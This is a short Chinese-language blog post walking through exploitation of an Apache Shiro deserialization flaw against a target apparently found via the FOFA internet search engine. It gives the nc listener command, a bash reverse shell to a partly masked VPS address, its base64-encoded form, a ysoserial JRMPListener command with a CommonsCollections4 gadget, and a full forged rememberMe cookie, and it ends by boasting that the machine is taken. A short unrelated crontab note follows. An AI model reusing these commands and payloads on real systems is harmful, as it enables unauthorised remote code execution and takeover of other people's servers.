Apache Shiro反序列化远程代码执行复现

1、寻找目标

首先FOFA找一个环境,检测工具检测一下

发现目标,开干!

2、开启监听

首先在vps运行nc 监听一个端口

nc -lvp 666

列出需要使用的反弹指令

bash -i >& /dev/tcp/129.204.xxx.xxx/666 0>&1

将指令放到http://www.jackson-t.ca/runtime-exec-payloads.html转换成加密后的指令

将指令合成为一个java的监听指令

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 '加密后的指令'
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaxxxxxxxxxxxxxxxxxxxxxxxxxxxxkuMjA0LjExMy4yMDIvNjY2IDA+JjE=}|{base64,-d}|{bash,-i}'

3、利用poc生成cookie

我不是一个合格的网安人员。。

python2 -m pip install pycryptodome

安装这个库就可以了。

然后进入这个库的目录:Lib\site-packages

找到 crypto 这个库,更改为首字母大写 Crypto 即可

得到cookie

rememberMe=3Wb6O2eQTCeimDMS1uEUQANKouApX2EvmE7yZfXgnZWN+pxrZ4jH+CTcjRPRyuMXFt1NbRzH+IZhT7yoiK87ptD2HcSqqGKw50bEeDWdKPV7UDix82FQx5SQpYpVipyXk6LNO/BMFtMzvEsdjB6b9hMsHqz8/WVPWtT6V3J1Iq8oXm1MBfLSe7y8zd4BtM1vru+FyUSVdkw5Bv2pkB7o0LrUkhtbM58PVlxFgMBtU2nE0fvClfeX5ay0WINJjeGC8KQzMP0SFsWnnAwcJG513sPd796ppfEI8+esJ57yfRpiPXmlz9ZFMx66tvsVU9Enq1dCXOLNQPWkz+uLf5VDOO80nV6R0f+7+EXY/egY7w+hWNKJwDngKXvuyINGhhOVOrEzneSfCtvD8tOadPcU7A==

抓包进行发送

弹回来了。

 

机器到手,溜了溜了。。。

4、小记

crontab从文件导入和导出到文件

#导入 
[root@localhost ~]# crontab filename 
#导出 
[root@localhost ~]# crontab -l >filename

 

posted @ 2020-06-28 17:06  浅笑996  阅读(400)  评论(0编辑  收藏  举报